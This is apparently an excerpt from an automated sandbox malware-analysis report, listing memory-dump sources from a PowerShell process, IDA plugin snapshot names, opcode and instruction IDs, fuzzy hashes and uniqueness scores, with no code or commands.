                                • Instruction ID: 7897da14eb7ef2caff187de42426b6e050ba40f204e94a59e87f37114d64f285
                                • Opcode Fuzzy Hash: 6e8c4d6d4b67a10b5f66d2546725f3de0d083f7db6b534d896599b18216886e8
                                • Instruction Fuzzy Hash: 7A51C19281E7C52FE3979B784C695A53FA5DF53250B1A81FBE1C8CB0E3D808190A8362
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fdc71bb7de7f8614aaf7a566c1eb0ab7be05e53efbd8b9b6d72e3d8a5f76806
                                • Instruction ID: 67f758db694318416cba1436cbfac724df7c71730207371e7eb42434c4642a30
                                • Opcode Fuzzy Hash: 2fdc71bb7de7f8614aaf7a566c1eb0ab7be05e53efbd8b9b6d72e3d8a5f76806
                                • Instruction Fuzzy Hash: 74E155B290DA8A0FF795EF7CC8651B87BF1EF55250B1881FAD18DC71E3DA18A8058341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8b92d64764ace196ad9f572891eef56c05645617a879dc91656706a9f8088a5
                                • Instruction ID: e525ef6bf502c5f0080f28457ef7759376d72ac739dca03af693cd3694da508a
                                • Opcode Fuzzy Hash: f8b92d64764ace196ad9f572891eef56c05645617a879dc91656706a9f8088a5
                                • Instruction Fuzzy Hash: E95129A290EACA0FF392EE7DC9601786AE1FF55250B5881F9D28CC71E3DD18BC148341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575141265.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction ID: 69fd97c9042be542dbe079cffc1bcda63ff7c484daaeb389d3d0ef6b8bcd226c
                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction Fuzzy Hash: 6001677111CB0D8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3661DA36E882CB45
                                Uniqueness

                                Uniqueness Score: -1.00%